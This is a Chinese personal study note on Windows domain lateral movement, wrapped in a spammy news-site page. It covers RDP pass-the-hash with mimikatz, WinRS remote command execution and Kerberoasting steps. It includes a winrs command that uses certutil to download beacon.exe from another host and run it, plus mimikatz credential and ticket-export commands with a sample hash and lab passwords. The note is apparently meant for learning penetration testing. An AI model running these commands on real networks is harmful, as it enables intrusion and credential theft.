当前位置: 首页 > news >正文

网站流量分析软件网站关键词google优化怎么做

news 2025/9/17 19:48:09
网站流量分析软件,网站关键词google优化怎么做,画册设计网站推荐,青岛电商网站制作用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文&NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRM&WinRS-明文&NTLM 1.探针可用: 2.连接…

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-RDP-明文&NTLM

1.探针服务:

2.探针连接:

3.连接执行:

二、域横向移动-WinRM&WinRS-明文&NTLM

1.探针可用:

2.连接执行:

3.上线 CS&MSF:

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

Kerberoasting攻击的利用:

一、域横向移动-RDP-明文&NTLM

RDP连接:
1、直接在当前被控主机上进行远程连接
2、建立节点进行连接
3、端口的转发(当前2222去访问目标的3389) ——  访问被控2222

远程桌面服务 支持明文及 HASH 连接
条件:双方开启 RDP 服务 远程桌面

1.探针服务:

cs 内置端口扫描 3389
tasklist /svc | find "TermService"      # 找到对应服务进程的 PID
netstat -ano | find "PID "              # 找到进程对应的端口号

2.探针连接:

CrackMapExec&MSF 批扫用户名密码验证
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket-CSDN博客

3.连接执行: 

明文连接:
mstsc /console /v:192.168.3.32 /admin
HASH 连接:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

二、域横向移动-WinRM&WinRS-明文&NTLM

WinRM 代表 Windows 远程管理,是一种允许管理员远程执行系统管理任务的服务。
默认情况下支持 Kerberos NTLM 身份验证以及基本身份验证。
移动条件:双方都启用的 Winrm rs 的服务!
使用此服务需要管理员级别凭据。
Windows 2008 以上版本默认自动状态, Windows Vista/win7 上必须手动启动;
Windows 2012 之后的版本默认允许远程任意主机来管理。
攻击机开启:
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:

cs 内置端口扫描 5985
powershell Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

2.连接执行:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线 CS&MSF:

winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe & beacon.exe"

4.CS 内置横向移动

三、域横向移动-Spn&Kerberos-请求&破解&重写

应用背景:在得不到正确密码明文值或哈希值的情况下,实现横向移动。

资源:

https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html

Kerberoasting攻击的利用:

•SPN服务发现
•请求服务票据
•服务票据的导出
•服务票据的暴力破解

如需利用需要配置策略加密方式(对比)
黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个
目标服务的服务票证。
DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能验证用
户是否可以访问。
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码
哈希用于加密服务票证。 

黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为
Kerberoast攻击。
如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值
就将用于创建服务票证。

Kerberoast攻击条件:
采用rc4加密类型票据,工具Rubeus检测或看票据加密类型


1.扫描:

powershell setspn -T 0day.org -q */*
powershell setspn -T 0day.org -q */* | findstr "MSSQL"


2.检测:

Rubeus kerberoast

3.请求:

powershell Add-Type -AssemblyName System.IdentityModelpowershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"mimikatz kerberos::ask /target:MSSQLSvc/Sqlserver.god.org:1433

4.查看和导出票据:

查看票据:klist
导出:
mimikatz kerberos::list /export

5.破解:

python tgsreporack.py pass.txt "1-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi"

6.重写:

https://www.freebuf.com/articles/system/174967.html

http://www.yayakq.cn/news/221503/

相关文章:

  • 阿里云模板建站怎么样如何利用互联网宣传与推广
  • 网站优化方案 site wwwordpress清除无用的数据库表
  • 在本地做的网站上传到空间之后_刷新就跳到本地的网址怎么办百度抓取网站
  • 哪些网站适合用自适应wordpress有什么好看的主题
  • mt4外汇金融网站建设河北哪里在建设
  • 哪些属于功能型网站设计模板app
  • 网站被降权会发生什么360网页游戏大厅
  • 网网站建设设计深汕特别合作区小漠镇
  • 怎么样购买服务器建设网站山西大同专业网站建设价格
  • 一家做特卖的网站叫什么个人博客模板网站
  • 适合做外链的网站廉江网站制作
  • 章丘公司做网站网站建设公司的公众号
  • 南宁网站制作费用响应式网站模块
  • 建湖专业做网站的公司网络营销分析报告
  • 有哪些网站开发技术网站如何做触屏滑动效果
  • 易语言怎么把网站音乐做进去宁波电商平台网站建设
  • 亚马逊网站入口公众号免费推广平台
  • icp备案通过了 怎么修改我的网站网站对于企业的
  • wordpress软件网站模板下载失败一般小程序开发多少钱
  • 湖南网站建设磐石网络河南省建设工程质量监督信息网
  • 黑龙江省城乡建设厅网站网络课程设计报告
  • iis网站配置教程wordpress 打卡插件
  • vc6.0做网站垂直网站 开源码
  • 买书的网站排名牟平建设企业网站
  • wordpress 下雪上海网络优化seo
  • 网站建设加优化wordpress经验
  • 微应用和微网站的区别是什么wordpress免费网站
  • 企业网站建设可行性eclipce做网站
  • 站群系列服务器做视频网站宝塔设置加速wordpress站点
  • 做网站推广每天加班宝安中心医院官网